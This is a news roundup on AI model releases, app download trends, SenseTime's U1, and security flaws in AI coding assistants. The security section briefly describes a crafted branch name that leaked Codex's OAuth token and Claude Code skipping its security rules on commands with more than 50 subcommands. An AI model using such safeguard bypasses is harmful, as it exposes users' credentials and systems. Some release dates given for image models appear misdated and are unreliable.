American AI startup Poolside on Tuesday released Laguna XS.2, a free open source model optimized for agentic coding workflows that can write code, use third-party tools, and take autonomous actions. According to VentureBeat, the San Francisco-based company founded in 2023 launched two new Laguna large language models alongside a coding agent harness called “pool” and a web-based development environment named “shimmer.”
The release comes as Chinese companies like DeepSeek and Xiaomi have dominated the open source AI space with high-performance, low-cost models that rival proprietary offerings from OpenAI and Anthropic.
https://x.com/eisokant/status/2049142230397370537
Image Models Drive Mobile App Growth
Image generation capabilities now drive significantly more mobile app downloads than traditional text model updates, according to new data from Appfigures. TechCrunch reported that image model releases generate 6.5x more downloads than conversational model upgrades, marking a shift from earlier adoption patterns.
Google’s Gemini app added over 22 million downloads in the 28 days following its Gemini 2.5 Flash image model release in August 2024, representing a 4x increase in downloads during that period. ChatGPT saw similar gains with over 12 million incremental installs after introducing its GPT-4o image model in March 2024 — roughly 4.5x more downloads than its text-only model releases.
Meta AI’s video model “Vibes” generated an estimated 2.6 million additional downloads within 28 days of its September 2025 release, though the report noted that increased downloads don’t always translate to higher mobile revenue.
SenseTime Releases Speed-Optimized Image Model
Chinese AI company SenseTime launched SenseNova U1, an open source model that processes images directly without converting them to text first, significantly reducing computing requirements. Wired reported that the sanctioned company claims U1 can generate and interpret images faster than leading US competitors.
“The model’s entire reasoning process is no longer limited to text. It can reason with images as well,” Dahua Lin, SenseTime’s cofounder and chief scientist, told Wired. The company designed U1 to run on Chinese-made chips, with 10 domestic chipmakers including Cambricon and Biren Technology announcing hardware support on launch day.
SenseTime released U1 for free on Hugging Face and GitHub, continuing the trend of Chinese companies contributing extensively to open source AI development. The model’s direct image processing capability could enable robots to better understand physical environments, according to Lin.
Security Vulnerabilities Target AI Coding Credentials
Multiple security researchers have exposed critical vulnerabilities in AI coding assistants, with every exploit targeting authentication credentials rather than the models themselves. VentureBeat reported that six research teams disclosed exploits against Codex, Claude Code, Copilot, and Vertex AI over nine months, following identical attack patterns.
BeyondTrust researchers demonstrated in March that a crafted GitHub branch name could steal Codex’s OAuth token in cleartext, which OpenAI classified as Critical P1. Days later, Claude Code’s source code leaked onto the public npm registry, and Adversa found the system ignored its own security rules when commands exceeded 50 subcommands.
Merritt Baer, CSO at Enkrypt AI and former Deputy CISO at AWS, explained the core issue: “Enterprises believe they’ve ‘approved’ AI vendors, but what they’ve actually approved is an interface, not the underlying system.” The underlying credentials remain the primary attack vector.
Cisco Addresses AI Model Provenance Issues
Cisco released Model Provenance Kit, an open source tool designed to help organizations track and verify third-party AI models from repositories like HuggingFace. SecurityWeek reported that the tool addresses security, compliance, and liability risks associated with unverified model claims and inadequate documentation.
Organizations frequently deploy models without tracking modifications or verifying developer claims about sources, vulnerabilities, and training biases. According to Cisco, these gaps can lead to the deployment of poisoned or manipulated models, creating downstream security risks in internal chatbots, agent applications, and customer-facing tools.
The tool aims to provide model lineage tracking for incident response and remediation, while addressing licensing and regulatory compliance requirements. Government mandates for AI system documentation make provenance tracking increasingly critical for enterprise deployments.
What This Means
The AI model landscape shows three distinct trends emerging simultaneously. American companies like Poolside are entering the open source competition previously dominated by Chinese firms, potentially reshaping the narrative that only foreign companies can deliver high-performance, affordable AI models.
Image and visual processing capabilities have become the primary driver of consumer adoption, suggesting users find immediate practical value in visual AI over conversational improvements. This shift indicates that multimodal capabilities, not just text generation quality, determine market success.
Security concerns around AI coding assistants reveal a fundamental architecture problem where credentials, not models, represent the primary attack surface. As enterprises integrate more AI tools into development workflows, the focus must shift from model security to credential management and authentication protocols.
FAQ
What makes Poolside’s Laguna XS.2 different from other coding models?
Laguna XS.2 is optimized specifically for agentic workflows, meaning it can autonomously write code, use third-party tools, and take actions beyond simple code generation. It’s also free and open source, competing directly with Chinese models on cost while maintaining US development.
Why are image models driving more app downloads than text models?
Image generation provides immediate, visible value that users can easily understand and share, while text model improvements are often incremental and less noticeable. Visual content creation appeals to broader audiences beyond technical users who primarily benefited from conversational AI improvements.
How serious are the security vulnerabilities in AI coding assistants?
The vulnerabilities are critical because they target authentication credentials that provide direct access to production systems. Unlike traditional software bugs, these exploits can compromise entire development environments and repositories without requiring user interaction, making them particularly dangerous for enterprise deployments.
Related news
- NVIDIA Isaac GR00T N1.7: Open Reasoning VLA Model for Humanoid Robots – HuggingFace Blog
- DenseOn with the LateOn: Open State-of-the-Art Single and Multi-Vector Models – HuggingFace Blog






